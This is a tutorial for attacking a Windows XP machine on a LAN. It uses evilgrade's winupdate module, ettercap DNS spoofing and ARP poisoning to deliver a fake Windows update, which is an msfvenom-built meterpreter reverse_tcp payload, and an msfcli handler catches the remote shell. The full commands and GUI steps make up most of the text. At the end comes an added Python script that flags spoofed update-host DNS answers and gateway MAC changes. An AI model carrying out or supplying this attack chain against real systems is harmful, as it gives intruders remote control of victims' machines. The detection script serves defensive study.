After installing evilgrade on Backtrack 5 (see the tutorial on how to install evilgrade on Backtrack 5), we now try to use it. In this tutorial we will use the new Metasploit tool named "msfvenom" to create the shell and use it to pwn the victim. You can download this tutorial document and my ettercap-ng, which I compiled myself, at the end of this post.
Attacker IP: 192.168.168.156 [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: 192.168.168.159 [Windows XP SP2]
1. Go to the evilgrade directory and run it.
$ cd /pentest/exploits/isr-evilgrade
2. After all modules are loaded, you can list them with this command.
evilgrade> show modules
3. Pick the module that you want to spoof; in this tutorial I pick "winupdate" to pwn a victim machine whose user wants to update Windows.
evilgrade> configure winupdate
4. Show the options of this module.
evilgrade(winupdate)> show options
5. Set the agent that runs when the victim requests a Windows update. In this step we use msfvenom to create and encode the payload.
evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.168.156 LPORT=445 -f exe 1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'
6. Make sure that you don't have a DNS service (port 53) running on the host, and that the port chosen as LPORT in step 5 is not already in use.
7. Start the evilgrade server.
8. Edit /usr/share/ettercap/etter.dns with any text editor so that "windowsupdate.microsoft.com", "update.microsoft.com", "www.microsoft.com" and "go.microsoft.com" resolve to the spoofed address, as shown in the picture.
9. Run ettercap with the -G option for the GUI.
$ ettercap -G
10. Go to Sniff -> Unified Sniffing.
11. Choose the interface you want to sniff on.
12. Enable the DNS spoofing plugin via Plugins -> Manage the Plugins -> double-click "dns_spoof".
13. Scan for machines on the same network via Hosts -> Scan for hosts.
14. View the hosts on the network and set the victim via Hosts -> Hosts list -> click the gateway IP and [Add to Target 1] -> click the victim IP and [Add to Target 2].
15. Start the attack via Mitm -> Arp poisoning -> tick "Sniff remote connections".
16. Start sniffing via Start -> Start Sniffing.
17. Use Metasploit's msfcli command to start a handler that listens for the connection back from the victim machine.
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=192.168.168.156
18. On the victim machine, try to update Windows. The request to windowsupdate.microsoft.com is redirected to the attacker machine, and a popup asks the victim to download the update file.
19. When the victim runs the update file, we get the meterpreter session.
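Both halves of this procedure leave footprints on the network that a defender can look for: the spoofed etter.dns entries make public Microsoft update hostnames resolve to a private LAN address, and the ARP poisoning changes the MAC address that hosts associate with the gateway IP. The following Python script is an added example for this page, not code from the original tutorial or from evilgrade, ettercap or Metasploit. The log line formats, the gateway address 192.168.168.1 and all MAC addresses are constructed for the example; the poisoned answer reuses the attacker IP from the setup above.

```python
"""Detection example (added here, not part of the original tutorial):
flag the two observable side effects of the attack described on this page.
 1. DNS answers that resolve Microsoft update hostnames to a private
    (RFC 1918) address instead of a public one.
 2. ARP replies that change the MAC address associated with the gateway IP.
The log line formats are constructed for this example and are not the
output of any particular tool."""
import ipaddress
import re
from collections import defaultdict

# Hostnames the tutorial spoofs in etter.dns; a defender would extend this
# set with every auto-update domain the fleet relies on.
WATCHED_HOSTNAMES = {
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
    "www.microsoft.com",
    "go.microsoft.com",
}

# Constructed sample lines: "DNS <client> <qname> A <answer>".
DNS_LOG = """\
DNS 192.168.168.159 windowsupdate.microsoft.com A 192.168.168.156
DNS 192.168.168.159 www.example.com A 93.184.216.34
DNS 192.168.168.159 update.microsoft.com A 192.168.168.156
DNS 192.168.168.160 go.microsoft.com A 23.48.23.10
"""

# Constructed sample lines: "ARP <ip> is-at <mac>". The gateway IP and the
# MAC addresses are invented for the example.
ARP_LOG = """\
ARP 192.168.168.1 is-at 00:11:22:33:44:55
ARP 192.168.168.159 is-at 00:0c:29:aa:bb:cc
ARP 192.168.168.1 is-at 00:0c:29:de:ad:01
ARP 192.168.168.1 is-at 00:0c:29:de:ad:01
"""

DNS_RE = re.compile(r"^DNS (\S+) (\S+) A (\S+)$")
ARP_RE = re.compile(r"^ARP (\S+) is-at (\S+)$")


def suspicious_dns_answers(log: str):
    """Return (client, qname, answer) tuples where a watched hostname resolves
    to a private address. Public update hosts never live in RFC 1918 space,
    so such an answer means a resolver or an on-path host is lying."""
    hits = []
    for line in log.splitlines():
        m = DNS_RE.match(line.strip())
        if not m:
            continue
        client, qname, answer = m.groups()
        if qname.lower().rstrip(".") not in WATCHED_HOSTNAMES:
            continue
        try:
            addr = ipaddress.ip_address(answer)
        except ValueError:
            continue  # malformed answer field; not our concern here
        if addr.is_private:
            hits.append((client, qname, answer))
    return hits


def gateway_mac_changes(log: str, gateway_ip: str):
    """Return (old_mac, new_mac) transitions observed for the gateway IP.
    A healthy LAN shows one stable MAC for the gateway; a change mid-session
    is the classic footprint of ARP cache poisoning."""
    seen = defaultdict(list)  # ip -> list of distinct consecutive MACs
    for line in log.splitlines():
        m = ARP_RE.match(line.strip())
        if not m:
            continue
        ip, mac = m.groups()
        mac = mac.lower()
        if not seen[ip] or seen[ip][-1] != mac:
            seen[ip].append(mac)
    macs = seen.get(gateway_ip, [])
    return list(zip(macs, macs[1:]))


def main():
    for client, qname, answer in suspicious_dns_answers(DNS_LOG):
        print(f"ALERT dns-spoof: {client} got {qname} -> {answer} (private address)")
    for old, new in gateway_mac_changes(ARP_LOG, "192.168.168.1"):
        print(f"ALERT arp-poison: gateway MAC changed {old} -> {new}")


if __name__ == "__main__":
    main()
```

Run against the constructed logs, the script reports the two spoofed update lookups from the victim and one gateway MAC change; the repeated identical ARP reply on the last line is not reported because only transitions between different MACs count. Feeding it real resolver and ARP monitor output only requires adapting the two regular expressions.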